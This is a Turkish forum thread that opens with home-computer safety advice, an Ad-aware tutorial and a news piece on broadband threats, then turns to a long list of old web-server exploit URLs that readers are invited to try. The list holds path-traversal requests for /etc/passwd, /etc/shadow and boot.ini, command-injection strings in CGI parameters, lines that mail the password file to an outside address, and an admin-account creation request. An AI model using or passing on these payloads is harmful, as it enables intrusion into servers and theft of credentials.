    • Çocuklar veya küçükler bilgisayarı istedikleri gibi kullanabiliyorlar mı? Çocuklar ve Internet konusunda, tehlike iki şeritli bir yol gibidir. Interneti istedikleri gibi kullanmalarına izin verilen çocuklar hiç uygun bulmayacağınız Web siteleri ile karşılaşabilir ve bağlantı kurabilirler. Ayrıca, görünüşte zararı olmayan bir içeriği karşıdan yükleyerek istemeden de olsa bilgisayara bir virüs girmesine neden olabilirler. Daha fazla bilgi için aşağıdaki bağlantılara göz atın:

    • Çocukların çevrimiçi güvenliği konusunda bilmem gerekenler nelerdir?

    • Internet Explorer İçerik Danışmanı’nın ayarlarını nasıl yapabilirim?

    • Ziyaretçileriniz veya arkadaşlarınız bilgisayarınızı kullanıyor mu? Bilgisayarınızı kullanarak e-postalarına bakan veya karşıdan dosya yükleyen arkadaşlarınız, akrabalarınız ve iş arkadaşlarınız virüs içeren bir eki açabilirler. Şüpheli Web siteleri bilgisayarınıza “zararlı bir yazılım” bulaştırabilir.

    Bilgisayarınızı kim kullanırsa kullansın, aşağıdaki adımları uygulayarak zararlı saldırı ve virüs tehlikesini en az düzeye indirebilirsiniz:

    Virüse karşı koruma yazılımları kullanın
    Yazılımınızı sürekli olarak güncelleştirin
    Bir güvenlik duvarı kullanın
    Güvenlik ayarlarınızı gözden geçirin
    Güçlü parolalar oluşturun
    Belirli aralıklarla güvenliği gözden geçirin

    2. Internet’e nasıl bağlanıyorsunuz?

    Her zaman bağlantılı mısınız (bir kablolu modem veya DSL yoluyla)?

    Sürekli Internet’e bağlı durumda iseniz ve bir güvenlik duvarı kullanmıyorsanız, bilgisayarınız muhtemel bir hedef teşkil edecektir. Aşağıdaki adımları uygulayın:

    Virüse karşı koruma yazılımları kullanın.
    Yazılımınızı sürekli olarak güncelleştirin.
    Bir güvenlik duvarı kullanın. Windows XP kullanıyorsanız, Internet Bağlantısı Güvenlik Duvarı işlevini kullanarak koruma düzeyini istediğiniz gibi ayarlayabilirsiniz.
    Güvenlik ayarlarınızı gözden geçirin.
    Belirli aralıklarla güvenliği gözden geçirin.
    Çevrimiçi olmanız gerekmediği zamanlar bağlantınızı kesin.

    3. Bilgisayarınızı kullanan insanlar Internet’te ne gibi işlemler yapıyorlar?

    Çevrimiçi veya yüz yüze olarak insanlarla buluştuğunuz ve iletişim kurduğunuzda düşündüğünüz temel kurallar geçerlidir: Kiminle iş yaptığınızı bilmek istersiniz, tanımadığınız kişilere karşı dikkatli olursunuz.

    Bilgisayarınızı kullanan kişilerden alışveriş yapanlar, banka işlemlerini yürütenler, faturalarını ödeyenler, hisse senedi veya yatırım fonu alanlar ya da yasadışı bir şey yapanlar var mı?

    Hayal edemeyeceğiniz kadar ucuza mal satan şüpheli satıcılara karşı dikkatli olmanız gerekebilir, ancak çevrimiçi elektronik güvenlik iletişim kuralları ve uygulamaları kredi kartı bilgilerinizi telefonda karşı tarafa açıklamaktan çok daha güvenli olabilmektedir. Sitenin yasal, yapacağınız işlemlerin güvenli olacağından emin olmak için:

    Onay mührü bağlantılarını tıklatarak kimlik doğrulaması yapın: TrustE , BBBOnline (Better Business Bureau çevrimiçi biçimi) ve çevrimiçi perakendecilere 10 üzerinden not veren BizRate.com .
    Şirketi telefondan arayarak güven verici bir şekilde konuşup konuşmadıklarına bakın.
    Gizlilik ilkelerini okuyun: Verdiğiniz kişisel bilgilerinizi nerede kullanacaklar? İfadeler açık ve anlaşılır değilse vazgeçin.
    Kredi kartı veya kişisel bilgilerinizi girmeden önce, yapacağınız işlemlerin şifreleneceğinden emin olun: Adres çubuğunda “http” yerine “https” ifadesinin ve tarayıcınızın alt kısmındaki görev çubuğunda güvenli “kilit” simgesinin bulunmasına dikkat edin.
    Aylık işlem raporlarınızı gözden geçirin, yapmadığınız bir işlem olup olmadığına bakın. Microsoft’un gizlilik ilkeleri’ni okuyun.
    E-posta gönderiyor ve alıyor musunuz?

    E-posta ekleri virüs yaymada en sık kullanılan öğelerdir. Yalnızca bir iletiyi açmakla, içerdiği virüsün bulaşmasına neden olabilirsiniz. Şu önlemleri alın:

    Bilgisayarınıza Outlook 2000 İçin Microsoft Outlook E-posta Güvenlik Güncellemesi veya Outlook 98 yükleyin.
    Ekli bir posta geldiğinde, gönderen kişiyi tanımıyorsanız iletiyi açmayın ve hemen silin.
    Tanıdığınız adlar kullanılıyor olsa bile, “başkalarından size iletilen” postalara dikkat edin. Eki açmaya karar verirseniz, önce sabit diskinize kaydedin, böylece bilgisayarınızdaki virüse karşı koruma yazılımı gereken önlemi alabilir.
    Güvenlik ayarlarınızı gözden geçirin
    Yazılımınızı her zaman güncelleştirin (virüse karşı koruma ve e-posta yazılımlarınız)
    Gizli tutulmasını istediğiniz bir e-posta gönderiyorsanız postayı şifreleyin. Şifrelenmemiş e-posta iletileri kapatılmamış bir zarfa konan mektuptan farksızdır.

    Sohbet odalarına giriyor veya anlık mesaj gönderme (IM) programlarını kullanıyor musunuz?

    Internet’te sohbet oldukça hoş bir etkinlik olmasına karşın, pek çok tehlikeyi (örneğin, gerçek kişiliklerini gizleyen kullanıcılar) beraberinde getirir. Çevrimiçi sohbet üç, dört arkadaş arasında geçen konuşmalar gibi görünebilir, ancak yüzlerce insan o anda sizi dinliyor, yazdıklarınızı okuyor olabilir. Sohbet ve anlık mesaj uygulamaları çocuklar tarafından kullanıldığında, kişisel bilgilerini hiçbir zaman vermemeleri konusunda onları uyarın. Daha fazla bilgi için, getnetwise.com adresini ziyaret edin.

    Anlık mesaj çok kullanışlı ve eğlencelidir, ancak özel veya güvenli değildir. Gizli kalması gereken bilgilerinizi gönderiyorsanız, bir e-posta hesabı kullanın ve iletilerinizi şifreleyin.

    Çevrimiçi oyunlar oynuyor musunuz?

    Artık tüm dünyaya yayılmış olan çevrimiçi oyunlar güvenlik konusunda önemli sorunları (örneğin, oyun sırasında karşı oyuncudan gelen ve bilgisayarınıza zarar verebilecek bir eki yükleme) beraberinde getirmektedir.

    Ücretsiz müzik, film, resim veya yazılım programı (freeware) gibi dosyaları yüklüyor, başkalarıyla değiştiriyor musunuz?

    Internet’ten dosya yüklemek (eğer aldığınız şeyin ne olduğunu biliyorsanız) çok yararlıdır. Ancak bunlar bazı virüsler veya worm (solucan) ve Trojan (Truva atı) gibi bazı tehlikeli casus programlar içeriyor olabilir. Worm öğeleri bilgisayarınızın bir yerinde gizlenerek, bilgisayarınızın çökmesine neden olana kadar kendi kendilerini kopyalayıp çoğalabilirler. Trojan programları ise görünüşte yararlı programlardır (oyunlar ve yardımcı programlar gibi), ancak etkin hale geldiklerinde yıkıcı olurlar. Bu, özellikle dosyaların ortak kullanılması konusunda önemli bir sorun oluşturur.

    Herhangi bir dosyayı karşıdan yüklemeden önce:

    • Dosyanın sayısal imzaya sahip olup olmadığına bakın

    • Yalnızca güvendiğiniz kişi ve kuruluşlardan gelen dosyaları kabul edin

    7 Adım

    Sağduyunuzu kullanarak ve bilgisayarınızı tehlikeli saldırılardan ve eklerden koruyarak, Internet’in size sağladığı gizlilik haklarınızın ve imtiyazlarınızın çiğnenmemesini sağlayabilirsiniz. Aşağıdaki adımları uygulayarak tehlikeleri önemli ölçüde azaltabilirsiniz:

    Maruz kalabileceğiniz tehlikeleri belirleyin
    Virüse karşı koruma yazılımları kullanın
    Yazılımınızı sürekli olarak güncelleştirin
    Güvenlik ayarlarınızı gözden geçirin
    Bir güvenlik duvarı kullanın
    Güçlü parolalar oluşturun
    Belirli aralıklarla güvenliği gözden geçirin

    #29351

    Ad-aware programı çok kullanışlı bir program olup izinsiz olarak gelişmiş izleme sitemleri sayesinde bilgisayarınıza kurulu bulunan çeşitli programları bulmaya ve bunları yok etmeye yarar. Tüm windows sürümlerinde çalışmaktadır. Bu program bilgisayarınızın hafızasını, kayıt defterini, sabit ve sabit olmayan diskleri bilinen bütün istenmeyen-programlar için arar.

    (“Datamining, aggressive advertising, Parasites, Scumware, Keyloggers, selected traditional Trojans, Dialers, Malware, Browser hijackers, and tracking components” olarak tanımlanır.)

    Bu program Internet’te kişisel bilgilerinizin güvenli kalmasına yardımcı olur.

    14ag.png

    Ilk önce güncelleme işleminin yapılması yararlı olabilir. Nitekim bu istenmeyen programların sayısı ve niteliği gün geçtikçe değişmektedir. Gerekli güncellemeler için fare ile “Check for updates now” bağlantısını işaretleyin. “Connect” tuşuna tıklayın(1). Yeni referans dosyası varsa bunu size bildirecektir. Onaylamak için “OK” butonunu işaretleyin(2).Güncelleme işlemi bitince “Finish” tuşuna basınız

    24pj.png

    48ks.png

    Ayarlarda bazı değişiklikler yapmak için “Customize” bağlantısına tıklayınız.

    53pi.png

    Burada “Click here to select drives + folders” bağlantısını tıklayın(1). İstemiş olduğunuz disk alanlarını işaretleyin(2).

    68tr.png

    36qe.png

    Next” tuşuna basıp işlemi başlatın. Bu işlem uzun sürebilir. Bu işlem esnasında bilgisayarınızda başka birşey yapmaz iseniz yararlı olur.Tarama işlemi bittikten sonra aşağıdaki pencere gelir. “Next” tuşuna basınız.

    83vr.png

    Karşımıza tarama sonuçlarını gösteren bir pencere gelecektir.

    94wx.png

    Silinecek olan nesneleri tek tek fare ile işaretleyiniz.

    102so.png

    “Next” tuşuna basınca sizden onay isteyecektir. “OK” tuşuna tıklayınız

    Program bundan sonra gerekli işlemleri yapacak ve tekrar ilk pencereyi ekrana getirecektir. Eğer istenirse program tekrar baştan çalıştırılabilir.

    124vu.png

    Bilgisayarınızı kapatıp açtıktan sonra bu programı ikinci defa daha çalıştırınız.

    Yeni programlar yüklediğinizde, özellikle Internet’ten indirmiş olduğunuz programları kurduktan sonra bu programı çalıştırmanız yararlı olacaktır

    #29352

    ADSL kullanıcılarını bekleyen tehlikeler.!

    Infonet Genel Müdürü Taner Özdeş, ADSL kullanıcılarını bekleyen en önemli tehlikenin, genişbantta daha hızlı hareket edebilen virüs ve solucanlar olduğunu bildirdi.
    Özdeş, A.A muhabirine yaptığı açıklamada, hızla düşen internet erişim ücretleri ve genişbant servis hizmetlerinin yaygınlaşmasının, interneti diğer iletişim araçlarının önüne taşıdığını belirten Özdeş, 1.5 milyon kişiye yaklaşan ADSL abonelerini de bir çok tehlikenin beklediğini ifade etti.

    Söz konusu tehlikelerin başında, virüs ve solucanların bulunduğunu anlatan Özdeş, e-posta yoluyla veya internet üzerinden indirilebilecek bu zararlı programların, bilgisayarı çalışamaz hale getirerek önemli bilgilerin kaybolmasına yol açabileceğini söyledi.

    CASUS YAZILIMLARA DİKKAT

    İnternet üzerinden gelebilecek diğer önemli bir tehlikenin ise casus yazılım (spyware) ve trojanlar olduğunu belirten Özdeş, bu ajan programların bilgisayarda bulundurulan her türlü parola, kredi kartı bilgileri gibi değerli kişisel bilgileri çalabildiğine dikkati çekti. Özdeş, trojanların ise bilgisayarın uzaktan ele geçirilmesine ve başka kişilerin amaçları doğrultusunda kullanılabilmesine imkan sağlayabilecek ”arka kapılar” olduğunu kaydetti.

    Özdeş, son yıllarda bir genişbant kullanıcısını bekleyen bir başka tehlikenin ise ”Olta saldırısı” (phishing) adı verilen bir yöntem olduğunu anlattı. Özdeş, bu yöntemle kullanıcının kandırılarak, önemli bilgilerinin çalınmasının hedeflendiğini belirtti.

    Olta saldırılarında en çok kullanılan yöntemin ”e-posta yolu ile kullanıcıların yanlış sitelere yönlendirilmesi” olduğuna işaret eden Özdeş, özellikle internet bankacılığı kullanımının yaygınlaşmasının, olta saldırılarının bu alanda yoğunlaşmasına neden olduğunu söyledi.

    ”GELENEKSEL ANTİVİRÜS PROGRAMLARI YETERSİZ”

    Infonet Bilgi Teknolojileri Bilgi Güvenliği Danışmanı Murat Kültür ise eskiden beri kullanılan ve sadece virüslere karşı önlem alabilen geleneksel antivirüs programlarının bugün yetersiz kaldığını bildirdi.

    Saldırı tiplerine göre çok amaçlı güvenlik yazılımlarının kullanılmasının önemine işaret eden Kültür, genişbant kullanıcılarına; ”düzenli olarak güncellenen bir virüs, solucan, spyware ve trojan veri tabanına sahip olan, zararlı programları tespit edebildiği gibi, temizleme işlemini yapıp sistemi ilk haline getirebilen, Web üzerinde zararlı kod içeren sitelere erişimi engelleyen, olta saldırılarının yapıldığı sitelerin güncel bilgisini bulundurup bu sitelere erişimi engelleyen, etkin ve kolay kullanılabilir güvenlik duvarı (firewall) ve atak tespit sistemi (IDS) özelliklerini bulunduran yazılımlar” önerdiklerini belirtti.

    Kültür, ayrıca bu güvenlik yazılımlarının, Web üzerinden ve diğer yöntemler ile kullanılan e-posta alışverişleri sırasında e-postaları tarayabilen, zararlı programların bilgisayara bulaşmasını kolaylaştıran güvenlik açıklarını tespit edebilen ve kullanıcının belirlediği özel bilgilerin hareketini tüm sistemde izleyip bu durumu bildirebilen yapıda olması gerektiğini vurguladı.

    Söz konusu özellikleri sağlayan yazılımları kullanan genişbant kullanıcılarının, bahsedilen tehlikelerden büyük ölçüde korunmuş olacaklarına dikkati çeken Kültür, internet evrimini sürdürdükçe, tehlikelerin de değişip çeşitlilik göstermeye devam edeceğini, değişen ve gelişen tehlikelerden haberdar olup gerekli önlemleri almanın, güvenli bir internet kullanımı için vazgeçilmez hale geldiğini sözlerine ekledi.

    #29353

    Hiçbir zaman güvende olamayacığımız sanal ortamda mümkün olduğu kadar
    maksimum derece güvende olmanızı sağlayacağınız açıklamalar yapacağım

    1)Muhakkak Anti-Virüs Programı Kullanıp Update Edin.[Tavsiyem Kaspery]

    2)Firewall Kullanın [Zone Alarm Veya sygate]

    3)Spy ve Ad Silici Programlar Kullanın Spysweeper Tarzında

    4)Mecbur Kalmadığınız Durumlarda Halka Açık Yerlerde İnternet CAfe vb
    Yerlerde Mail Adreslerinize banka Hesaplarınıza Giriş YAPMAYIN
    Keylogger Tarzı Programla Şifreleriniz Kolaylıkla Çalınır
    Aynı Zamanda Pc den Kalkarken
    a)msn messenger için Başlat>çalıştır>control keymgr.dll yaparek kendi accountuzunu
    siliniz
    b)ctrl+shift+alt+g ye basın (yaygın bir keylogger çıkarsa herşeyi silin)
    c)araçlar>internet seçenekleri>içerik>otomatik tanımlama>form Parolalarını Silin
    d)ctrl+shift+del ile çalışan programları gözleyin
    e)banka hesaplarının girişi mouse ile tıklanarak doğrulanarak çalınmaz
    demeyin bal gibi çalınır nasıl mı ekran recorder la gayet basit çalınır

    5)Konuşma ortamında hiçbir kredi kartı vb. gibi bilgilerinizi vermeyin
    neden trojan yediysen alınan bir screen shotta herşeyiniz gözükebilir

    6)hiç kimseye ne şartta olursa olsun mail şifrenizi vermeyin

    7)maillerinizin güvenlik sorularını adam akıllı tahmin edilmeyecek bir şey yapın
    Aman Bir yere Yazın Kendiniz Unutmayın
    Maillerinize 2. Mail Adreside Koyun Yani şifreniz Oraya Gelir unutursanız

    9)Online msn de vb. daha tanımadığınız Kişilerden Kız Tavlayacam Diye virüs trojan yemeyin
    Hiçbir Dosyayı kabul etmeyin

    10)mailinize giriş yaptıysanız kolay kolay siz sign out demeden çıkmazsınız
    inbox a gelebilircek mailler daima dikkatli olun Gözünüz Herzaman ADres Çubuğunda Olsun Son Anda Yırtarsınz

    11)internet çektiğiniz dosyaları virüs taramasından geçiriniz sonra Çalıştırınız

    12)mümkünse sp2 krun ne kadar sisteminiz yavaşlıyor desenizde eğer kurmayacaksınız

    13)nuke Saldırıları için özellikle firewall kullanmam diyenler limitleyici kullansınlar

    15)olabildiğince ipinizi gizleyin proxy kullanın
    Araçlar>İnternet Seçenekleri>bağlantılar>yerel Ağ Bağlantılarında
    Hızlı Bir Proxy Kullanın onunla Uğraşamam Diyenler steganos internet anonimity adlı programı
    kullanarak devamlı ip değiştirere sörf yapabilirler

    #29354

    Bunları isterseniz elle yazarak isterseniz yazacağınız küçük bir programla otomatik olarak deneyebilirsiniz. Ama TeknolojiTv Üyeleri Kod Yazıp Cizmenin Eğlenceli Olduğunu Bilirlker : )

    [size=medium]Size tavsiyem böyle uzantı kullanmamanız. Ve Güvenliğinizi Yüksek Seviyede Tutmanız.[/size]

    Bence bu tür Açıklardan korunmanın en iyi yollarından biri dosya adlarını kelime yerine anlamsız rakamlar girin. Şahsen ben öyle yapıyorum tabi nereye kadar? kıran yine kırar.

    /./
    /..
    /../..
    /…./
    /……/
    /……/
    /……../
    /~
    /+/
    /+./
    /++/
    /++./
    /%00/
    :2301
    /2600-cgi/ezmlm-cgi
    /%2E%2E
    /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts
    /%2E%2E/%2E%2E/Program%20Files/AnalogX/SimpleServer/www/server.log
    :3000/../../hosts
    :3128/../../../../
    :3128/../../../conf/Eserv.ini
    :444/……….autoexec.bat
    :5000/
    :800/../..
    :8000/cgi/wja?page=wja
    :8000/servlet/com.livesoftware.jrun.plugins.jsp.JSP/../../../tst.txt
    :8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../test.jsp
    :8000/servlet/jsp/../../tst.txt
    :8000/servlet/ssifilter/../../test.jsp
    :8002/Newuser?Image=../../database/rbsserv.mdb
    :8003/Display
    :800/C:/
    :8010/
    :8010//
    :8010/…./
    :8010/c://
    :8010/d://
    :8010/Guide/../../../../../../../../../../../../../../../etc/shadow
    :8010/Guide/../../../../../../../../../../../var/CommuniGate/Accounts/postmaster.macnt/account.settings
    :801/../../../../../../../../etc/hosts
    :8080/anything.jsp
    :8080/../../../conf/Eserv.ini
    :8080/examples/jsp/snp/anything.snp
    :8080/tea/dynamic/system/teaservlet/Admin?admin=true
    :8088
    :80/../../../autoexec.bat
    :8100//WEB-INF/
    :8100//WEB-INF/webapp.properties
    :8100//WEB-INF/web.xml
    :8383
    :8888/
    :8888/ab2/@Ab2Admin
    :8888/cgi-bin/admin/admin
    :8888/cgi-bin/admin/admin?command=add_user&uid=percebe&password=perceb e&re_password=percebe
    :8987/sawmill?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
    :9000/cgi-bin/query%3f
    :901
    :9090
    :9090/board.html
    :9090/examples/applications/bboard/bboard_frames.html
    :9090/servlet/com.sun.server.http.pagecompile.jsp92.JspServlet/board.html
    :9998/
    /.access
    /achg.htr
    /active.log
    /ad.cgi?file=../../../../../../../../etc/hosts
    /admin/
    /admin.cgi
    /Admin_files/order.log
    /admin.htm
    /admin.html
    /admin/includes/
    /admin.php3
    /admin.php3?admin=whatever
    /admin.pl
    /admin-serv/config/admpw
    /admin.shtml
    /admisapi/fpadmin.htm
    /ads/admin.cgi
    /ads/adpassword.txt
    /adsamples/config/site.csc
    /AdvWorks/equipment/catalog_type.asp
    /advworks/equipment/catalog_type.asp
    /aexp2.htr
    /aexp3.htr
    /aexp4b.htr
    /aglimpse
    /Album/?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F.. %2F..%2Fetc&dispsize=640&start=0
    /aliredir.exe
    /……/ all
    /../../../../ all
    /amadmin.pl
    /AnalogX
    /anot3.htr
    /AnyForm2
    /anything.jsp
    /architext_query.pl
    /args.bat
    /ASPSamp/AdvWorks/equipment/catalog_type.asp
    /AT-admin.cgi
    /auctionweaver.pl
    /_AuthChangeUrl
    /_AuthChangeUrl?
    /authors.pwd
    /……/autoexec.bat
    /………/autoexec.bat
    /……autoexec.bat
    /aux
    /bash
    /.bash_history
    /bb-dnbd/bb-hist.sh
    /bboard_frames.html
    /beaninfo.cfm
    /bigconf.cgi
    /~bin
    /~bin/
    /bin
    /bin/
    /bin/common/user_update_admin.pl
    /bin/common/user_update_passwd.pl?user_id=V&firstname=FI&lastn ame=LA&course_id=SID&password1=NEWPWD&password2=NE WPWD
    /bizdb1-search.cgi
    /blabla.ida
    /blabla.idc
    /blabla.idq
    /blabla.idw
    /bnbform
    /bnbform.cgi
    /../../../../../../../boot.ini
    /../../boot.ini
    /build.cgi
    /campas
    /carbo.dll
    /cart32.exe
    /cart.cgi
    /catalog.nsf
    /catalog.nsf/
    /ccbill/
    /ccbill/secure/ccbill.log
    /cd/../config/html/cnf_gi.htm
    /cfappman/index.cfm
    /cfdocs/cfmlsyntaxcheck.cfm
    /cfdocs/exampleapp/docs/sourcewindow.cfm
    /cfdocs/exampleapp/docs/sourcewindow.cfm?Template=
    /cfdocs/exampleapp/email/application.cfm
    /cfdocs/exampleapp/email/getfile.cfm
    /cfdocs/exampleapp/email/getfile.cfm?filename=c:oot.ini
    /cfdocs/exampleapp/email/getfile.cfm?filename=c:oot.ini
    /cfdocs/exampleapp/publish/admin/addcontent.cfm
    /cfdocs/exampleapp/publish/admin/addcontent.cfm
    /cfdocs/exampleapp/publish/admin/application.cfm
    /cfdocs/examples/cvbeans/beaninfo.cfm
    /cfdocs/examples/CVLibrary/GetFile.CFM?FT=Text&FST=Plain&FilePath=C:oot.ini
    /cfdocs/examples/httpclient/mainframeset.cfm
    /cfdocs/examples/parks/detail.cfm
    /cfdocs/expelval/displayopenedfile.cfm
    /cfdocs/expelval/exprcalc.cfm
    /cfdocs/expelval/openfile.cfm
    /cfdocs/expelval/sendmail.cfm
    /cfdocs/expelvel/openfile.cfm
    /cfdocs/expeval/displayopenedfile.cfm
    /cfdocs/expeval/eval.cfm
    /cfdocs/expeval/exprcalc.cfm
    /cfdocs/expeval/openfile.cfm
    /cfdocs/expeval/sendmail.cfm
    /cfdocs/expressions.cfm
    /cfdocs/MOLE.CFM
    /cfdocs/root.cfm
    /cfdocs/snippets/evaluate.cfm
    /cfdocs/snippets/fileexist.cfm
    /cfdocs/snippets/fileexists.cfm
    /cfdocs/snippets/gettempdirectory.cfm
    /cfdocs/snippets/setlocale.cfm
    /cfdocs/snippets/viewexample.cfm
    /cfdocs/snippets/viewexample.cfm?Tagname=
    /cfdocs/TOXIC.CFM
    /cfdocs/zero.cfm
    /CFIDE/Administrator/startstop.html
    /cfide/Administrator/startstop.html
    /cfmlsyntaxcheck.cfm
    /cfusion/cfapps/forums/data/forums.mdb
    /cfusion/cfapps/forums/forums_.mdb
    /cfusion/cfapps/security/data/realm.mdb
    /cfusion/cfapps/security/realm_.mdb
    /cfusion/database/cfexamples.mdb
    /cfusion/database/cfsnippets.mdb
    /cfusion/database/cypress.mdb
    /cfusion/database/smpolicy.mdb
    /cgi
    /cgi/
    /cgi-bin
    /cgi-bin/
    /cgibin
    /cgibin/
    /cgi-bin/abuse.man?file=&domain=&script=
    /cgi-bin/ad.cgi?file=../../../../../../../../etc/hosts
    /cgi-bin/add_ftp.cgi
    /cgi-bin/admin.cgi
    /cgi-bin/Admin_files/order.log
    /cgi-bin/adp
    /cgi-bin/adpassword.txt
    /cgi-bin/ads.cgi
    /cgi-bin/ads.setup
    /cgi-bin/af.cgi
    /cgi-bin/aglimpse
    /cgi-bin/alibaba.pl
    /cgi-bin/alibaba.pl|dir
    /cgi-bin/alibaba.pl|dir
    /cgi-bin/aliredir.exe
    /cgi-bin/allmanage/adp
    /cgi-bin/allmanage.cgi
    /cgi-bin/allmanage/k
    /cgi-bin/allmanage.pl
    /cgi-bin/allmanage/settings.cfg
    /cgi-bin/allmanageup.pl
    /cgi-bin/allmanage/userfile.dat
    /cgibin/amadmin.pl?setpasswd
    /cgi-bin/AnyBoard.cgi
    /cgi-bin/anyboard.cgi
    /cgi-bin/AnyForm
    /cgi-bin/AnyForm2
    /cgi-bin/archie
    /cgi-bin/architext_query.cgi
    /cgi-bin/architext_query.pl
    /cgi-bin/ash
    /cgi-bin/AT-admin.cgi
    /cgi-bin/AT-generate.cgi
    /cgi-bin/authorize/dbmfiles/users
    /cgi-bin/awl/auctionweaver.pl
    /cgi-bin/awl/auctionweaver.pl?flag1=1&catdir=…………….&f romfile=Boot.ini
    /cgi-bin/ax-admin.cgi
    /cgi-bin/ax.cgi
    /cgi-bin/axs.cgi
    /cgi-bin/bash
    /cgi-bin/bb-ack.sh
    /cgi-bin/bb-dnbd
    /cgi-bin/bb-histlog.sh
    /cgi-bin/bb-hist.sh
    /cgi-bin/bb-hist.sh?HISTFILE=../../../../../../etc/hosts
    /cgi-bin/bb-hist.sh?HISTFILE=/home/*
    /cgi-bin/bb-hostsvc.sh
    /cgi-bin/bb-hostsvc.sh?HOSTSVC=/../../../../../../../../etc/hosts
    /cgi-bin/bb-replog.sh
    /cgi-bin/bb-rep.sh
    /cgi-bin/bigconf.cgi
    /cgi-bin/bigconf.cgi all
    /cgi-bin/bizdb1-search.cgi
    /cgi-bin/bizdb1-search.cgi?template=bizdb-summary&dbnamels|mail%20riotnation@hotmail.com|& f6=^a.*&action=searchdbdisplay
    /cgi-bin/blabla?%0a/bin/cat%20/etc/passwd
    /cgi-bin/bnbform
    /cgi-bin/bnbform.cgi
    /cgi-bin/bnbform.pl
    /cgi-bin/build.cgi
    /cgi-bin/cached_feed.cgi?../../../.+/etc/hosts
    /cgi-bin/cachemgr.cgi
    /cgi-bin/calendar
    /cgi-bin/calender_admin.pl
    /cgi-bin/calender.pl
    /cgi-bin/campas
    /cgi-bin/campas?%0acat%0a/etc/passwd%0a
    /cgi-bin/carbo.dll
    /cgi-bin/cart32.exe/expdate
    /cgi-bin/cart.pl
    /cgi-bin/cat
    /cgi-bin/cgiemail/uargg.txt
    /cgi-bin/cgiforum.cgi?thesection=../../../../../../etc/hosts%00
    /cgi-bin/cgiforum.pl?thesection=../../../../../../etc/hosts%00
    /cgi-bin/cgi-lib.pl
    /cgi-bin/CGImail.exe
    /cgi-bin/cgimail.exe
    /cgi-bin/Cgitest.exe
    /cgi-bin/cgitest.exe
    /cgi-bin/cgiwrap
    /cgi-bin/cgiwrap
    /cgi-bin/classified.cgi
    /cgi-bin/classifieds
    /cgi-bin/classifieds.cgi
    /cgi-bin/clickresponder.pl
    /cgi-bin/cmd.exe
    /cgi-bin/.cobalt/siteUserMod.cgi
    /cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi
    /cgi-bin/commander.pl
    /cgi-bin/cookmail
    /cgi-bin/cookmail/cookmail
    /cgi-bin/cookmail/cookmail.exe
    /cgi-bin/core
    /cgi-bin/Count.cgi
    /cgi-bin/count.cgi
    /cgi-bin/counterbanner
    /cgi-bin/counterbanner-ord
    /cgi-bin/counterfiglet
    /cgi-bin/counterfiglet/nc/fecho;w;uname%20-a;id
    /cgi-bin/counterfiglet-ord
    /cgi-bin/counter-ord
    /cgi-bin/cpmdaemon.cgi
    /cgi-bin/csh
    /cgi-bin/cvsweb.cgi
    /cgi-bin/data/nicks
    /cgi-bin/date
    /cgi-bin/day5datacopier.cgi
    /cgi-bin/day5datanotifier.cgi
    /cgi-bin/day5notifier
    /cgi-bin/db2www/library/document.d2w/report?uid=UNKNOWN&pwd=&search_type=SIMPLE&r_host= &last_page=db2www0022.html&fn=db2www.html
    /cgi-bin/dbman/db.cgi
    /cgi-bin/dbmlparser.exe
    /cgi-bin/dcforum/install_help.cgi
    /cgi-bin/dcguest.cgi
    /cgi-bin/dcguest/dcguest.cgi
    /cgi-bin/dfire.cgi
    /cgi-bin/dig.cgi
    /cgi-bin/disk2server.cgi
    /cgi-bin/dnewsweb
    /cgi-bin/donothing
    /cgi-bin/download.cgi
    /cgi-bin/dumpenv
    /cgi-bin/dumpenv.pl
    /cgi-bin/echo
    /cgi-bin/echo.bat
    /cgi-bin/edit.pl
    /cgi-bin/edit.pl
    /cgi-bin/environ.cgi
    /cgi-bin/environ.pl
    /cgi-bin/everythingform.cgi?config=../../../../../../../../bin/ping&Name=xx&e-mail=riotnation@hotmail.com
    /cgi-bin/ews
    /cgi-bin/excite
    /cgi-bin/ezmlm-cgi
    /cgi-bin/faxsurvey
    /cgi-bin/faxsurvey?/bin/ls%20-a
    /cgi-bin/.fhp
    /cgi-bin/fi
    /cgi-bin/fi?/etc/passwd
    /cgi-bin/filemail
    /cgi-bin/filemail.cgi
    /cgi-bin/filemail.pl
    /cgi-bin/files.pl
    /cgi-bin/finger
    /cgi-bin/finger.cgi
    /cgi-bin/finger.cgi?action=archives&cmd=specific&&filename= 99.10.28.15.23.username.|/bin/ls|
    /cgi-bin/finger?@localhost
    /cgi-bin/finger.pl
    /cgi-bin/finger?tiedotus@uta.fi%3B%2Fbin%2Fmail+riotnation@ hotmail.com+%3C+etc%2Fpasswd
    /cgi-bin/flexform
    /cgi-bin/flexform.cgi
    /cgi-bin/foo.cmd?xxx&dir
    /cgi-bin/FormHandler.cgi
    /cgi-bin/formhandler.cgi
    /cgi-bin/FormMail.pl
    /cgi-bin/formmail.pl
    /cgi-bin/formprocessor.asp?MailTo=riotnation@hotmail.com&Ma ilFrom=tst@no.net&Message=tst&MailTemplate1=/cgi-bin/formprocessor.asp
    /cgi-bin/formto.pl
    /cgi-bin/fortune
    /cgi-bin/forum-admin.pl
    /cgi-bin/forumdisplay.cgi
    /cgi-bin/forum.pl
    /cgi-bin/fpcount.exe
    /cgi-bin/fpexplore.exe
    /cgi-bin/fpexplorer.exe
    /cgi-bin/ftpdiag.cgi
    /cgi-bin/ftp/ftp.pl?dir=../../../../../../etc
    /cgi-bin/futureforum.cgi
    /cgi-bin/gbook.cgi?_MAILTO=xx;ls
    /cgi-bin/get16.exe
    /cgi-bin/get32.exe
    /cgi-bin/get32.exe|dir
    /cgi-bin/getdoc.cgi
    /cgi-bin/gH.cgi
    /cgi-bin/glimpse
    /cgi-bin/guestadd.pl
    /cgi-bin/guestbook.cgi
    /cgi-bin/guestbook.pl
    /cgi-bin/GW5
    /cgi-bin/GW5/GWWEB.EXE
    /cgi-bin/GW5/GWWEB.EXE?HELP=bad-request
    /cgi-bin/GW5/GWWEB.EXE?HELP=../../../../../index
    /cgi-bin/GWWEB.EXE
    /cgi-bin/handler
    /cgi-bin/handler.cgi
    /cgi-bin/hello.bat
    /cgibin/htgrep/file=index.html&hdr=/etc/hosts
    /cgi-bin/htimage.exe
    /cgi-bin/htmldocs
    /cgi-bin/html_page?TEMPLATE=main
